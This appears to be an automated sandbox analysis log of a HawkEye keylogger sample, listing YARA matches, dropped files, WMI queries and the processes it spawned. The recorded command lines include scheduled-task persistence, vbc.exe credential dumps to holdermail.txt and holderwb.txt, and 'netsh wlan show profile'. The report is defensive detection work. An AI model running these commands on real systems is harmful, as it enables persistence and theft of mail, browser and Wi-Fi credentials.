Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: B6LNCKjOGt5EmFQ.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TcVfsyyjYuQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Pictures.exe.8.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: Pictures.exe.8.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: Pictures.exe.8.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: Pictures.exe.8.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Pictures.exe.8.dr, Form1.cs	Base64 encoded string: 'jLDFXdPp/aSqMg8c6nmqYAnMHqu4RKPQmOX0IzUJgPUsVuhoSdvgoW9ev7/V5wH4fXvuYswWQ/LZ+ye1hqPRZw==', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Base64 encoded string: 'jLDFXdPp/aSqMg8c6nmqYAnMHqu4RKPQmOX0IzUJgPUsVuhoSdvgoW9ev7/V5wH4fXvuYswWQ/LZ+ye1hqPRZw==', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	Base64 encoded string: 'jLDFXdPp/aSqMg8c6nmqYAnMHqu4RKPQmOX0IzUJgPUsVuhoSdvgoW9ev7/V5wH4fXvuYswWQ/LZ+ye1hqPRZw==', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@25/14@49/5

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A24E52 AdjustTokenPrivileges,		10_2_04A24E52
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A24E1B AdjustTokenPrivileges,		10_2_04A24E1B

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File created: C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\WtsosTEBOBiSalvAHUcave
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_01

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File created: C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp

Jump to behavior

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: B6LNCKjOGt5EmFQ.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File read: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe 'C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}
Source: unknown	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe 'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Pictures.exe 'C:\Users\user\AppData\Local\Temp\Pictures.exe' 0
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\PO456724392021.exe 'C:\Users\user\AppData\Local\Temp\PO456724392021.exe' 0
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe 'C:\Users\user\AppData\Local\Temp\PO2345714382021.exe' 0
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2184
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe 'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\Pictures.exe 'C:\Users\user\AppData\Local\Temp\Pictures.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\PO456724392021.exe 'C:\Users\user\AppData\Local\Temp\PO456724392021.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe 'C:\Users\user\AppData\Local\Temp\PO2345714382021.exe' 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

